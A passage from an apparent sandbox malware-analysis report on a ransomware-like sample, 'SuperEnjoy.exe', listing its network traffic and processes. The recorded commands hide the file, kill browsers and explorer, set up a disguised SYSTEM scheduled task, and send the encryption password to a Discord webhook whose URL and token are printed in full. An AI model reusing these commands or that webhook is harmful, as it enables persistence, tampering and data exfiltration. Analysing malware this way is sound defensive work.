                                                                                                                                                                    Feb 6, 2021 21:36:12.706176043 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:14.457777023 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.475943089 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.519150019 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.519283056 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.523732901 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.566807032 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.569828033 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.570034981 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.570130110 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.571997881 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.615489006 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.615545034 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.615576982 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.618606091 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.695863962 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.695964098 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.696068048 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.696177006 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.739137888 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.739181042 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.739207029 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.779401064 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.780291080 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.951155901 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.951200008 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.951229095 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.951258898 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.951355934 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:15.951395988 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:16.124968052 CET49730443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:16.168498993 CET44349730162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:16.168595076 CET49730443192.168.2.3162.159.128.233

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Feb 6, 2021 21:35:56.238411903 CET6083153192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:35:56.293771982 CET53608318.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:35:57.081051111 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:35:57.127770901 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:35:57.914794922 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:35:57.961625099 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:35:58.877435923 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:35:58.926414967 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:35:59.762835026 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:35:59.811867952 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:00.590174913 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:00.637197018 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:01.368037939 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:01.417659998 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:02.276448011 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:02.326302052 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:03.226140022 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:03.272989988 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.090348005 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:04.137957096 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.452002048 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:04.499202013 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.957266092 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:05.009375095 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.105704069 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:12.157502890 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:15.407434940 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:15.457338095 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:30.311716080 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:30.369117022 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:46.216212988 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:46.275633097 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:46.974452972 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:36:47.021502018 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:37:07.352220058 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:37:07.402007103 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:37:20.845130920 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:37:20.908010006 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:37:35.777506113 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:37:35.848263979 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:37:43.441576958 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:37:43.488521099 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:37:44.331418037 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:37:44.382142067 CET53612928.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:37:47.010185957 CET6361953192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:37:47.066951990 CET53636198.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:37:52.811768055 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:37:52.859014988 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:37:53.205213070 CET6194653192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:37:53.267286062 CET53619468.8.8.8192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:38:28.370976925 CET6491053192.168.2.38.8.8.8
                                                                                                                                                                    Feb 6, 2021 21:38:28.417869091 CET53649108.8.8.8192.168.2.3

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                    Feb 6, 2021 21:36:04.452002048 CET192.168.2.38.8.8.80xa76Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:12.105704069 CET192.168.2.38.8.8.80x7ebStandard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:15.407434940 CET192.168.2.38.8.8.80x17bfStandard query (0)discord.comA (IP address)IN (0x0001)

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                    Feb 6, 2021 21:36:04.499202013 CET8.8.8.8192.168.2.30xa76No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:04.499202013 CET8.8.8.8192.168.2.30xa76No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:04.499202013 CET8.8.8.8192.168.2.30xa76No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:04.499202013 CET8.8.8.8192.168.2.30xa76No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:04.499202013 CET8.8.8.8192.168.2.30xa76No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:12.157502890 CET8.8.8.8192.168.2.30x7ebNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:12.157502890 CET8.8.8.8192.168.2.30x7ebNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:12.157502890 CET8.8.8.8192.168.2.30x7ebNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:12.157502890 CET8.8.8.8192.168.2.30x7ebNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:12.157502890 CET8.8.8.8192.168.2.30x7ebNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:15.457338095 CET8.8.8.8192.168.2.30x17bfNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:15.457338095 CET8.8.8.8192.168.2.30x17bfNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:15.457338095 CET8.8.8.8192.168.2.30x17bfNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:15.457338095 CET8.8.8.8192.168.2.30x17bfNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                                                                                    Feb 6, 2021 21:36:15.457338095 CET8.8.8.8192.168.2.30x17bfNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)

                                                                                                                                                                    HTTPS Packets

                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                    Feb 6, 2021 21:36:04.603044033 CET162.159.128.233443192.168.2.349727CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                    Feb 6, 2021 21:36:12.266810894 CET162.159.128.233443192.168.2.349729CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                    Feb 6, 2021 21:36:15.570034981 CET162.159.128.233443192.168.2.349730CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0bd0bf25947d4a37404f0424edf4db9ad
                                                                                                                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                                                                                    Code Manipulations

                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    Analysis Process: SuperEnjoy.exe PID: 4700 Parent PID: 5716

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:01
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Users\user\Desktop\SuperEnjoy.exe'
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1051648 bytes
                                                                                                                                                                    MD5 hash:B6CCB153BE2BAEB540E487CF5D52EE0B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: cmd.exe PID: 4084 Parent PID: 4700

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:02
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.bat C:\Users\user\Desktop\SuperEnjoy.exe'
                                                                                                                                                                    Imagebase:0x7ff77d8b0000
                                                                                                                                                                    File size:273920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: conhost.exe PID: 1092 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:02
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: attrib.exe PID: 6136 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:02
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:attrib C:\Users\user\Desktop\SuperEnjoy.exe +r +s +h
                                                                                                                                                                    Imagebase:0x7ff774dd0000
                                                                                                                                                                    File size:21504 bytes
                                                                                                                                                                    MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: DiscordSendWebhook.exe PID: 5440 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:03
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
                                                                                                                                                                    Imagebase:0x370000
                                                                                                                                                                    File size:988672 bytes
                                                                                                                                                                    MD5 hash:FB7A78F485EC2586C54D60D293DD5352
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 8%, Metadefender, Browse
                                                                                                                                                                    • Detection: 8%, ReversingLabs
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 1064 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:08
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im opera.exe
                                                                                                                                                                    Imagebase:0x7ff653640000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 5972 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:08
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im chrome.exe
                                                                                                                                                                    Imagebase:0x7ff653640000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 5952 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:08
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im firefox.exe
                                                                                                                                                                    Imagebase:0x7ff653640000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 3176 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:09
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im iexplore.exe
                                                                                                                                                                    Imagebase:0x7ff653640000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: mshta.exe PID: 4696 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:09
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\cryptormsg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                    Imagebase:0xfe0000
                                                                                                                                                                    File size:13312 bytes
                                                                                                                                                                    MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: taskkill.exe PID: 5992 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:10
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:taskkill /f /im explorer.exe
                                                                                                                                                                    Imagebase:0x7ff653640000
                                                                                                                                                                    File size:94720 bytes
                                                                                                                                                                    MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: schtasks.exe PID: 6168 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:10
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'
                                                                                                                                                                    Imagebase:0x7ff740b70000
                                                                                                                                                                    File size:226816 bytes
                                                                                                                                                                    MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: DiscordSendWebhook.exe PID: 6184 Parent PID: 4084

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:10
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':satellite: New Crypt from user, Password: nlhgQrx0YClnVSjR, FakeAccount: 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
                                                                                                                                                                    Imagebase:0x370000
                                                                                                                                                                    File size:988672 bytes
                                                                                                                                                                    MD5 hash:FB7A78F485EC2586C54D60D293DD5352
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: SuperEnjoy.exe PID: 6216 Parent PID: 528

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:11
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1051648 bytes
                                                                                                                                                                    MD5 hash:B6CCB153BE2BAEB540E487CF5D52EE0B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: cmd.exe PID: 6276 Parent PID: 6216

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:12
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Windows\sysnative\cmd.exe' /c 'C:\Windows\Temp\1810.tmp\1811.tmp\1812.bat C:\Users\user\Desktop\SuperEnjoy.exe'
                                                                                                                                                                    Imagebase:0x7ff77d8b0000
                                                                                                                                                                    File size:273920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: conhost.exe PID: 6288 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:12
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: attrib.exe PID: 6324 Parent PID: 6276

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:36:13
                                                                                                                                                                    Start date:06/02/2021
                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:attrib C:\Users\user\Desktop\SuperEnjoy.exe +r +s +h
                                                                                                                                                                    Imagebase:0x7ff774dd0000
                                                                                                                                                                    File size:21504 bytes
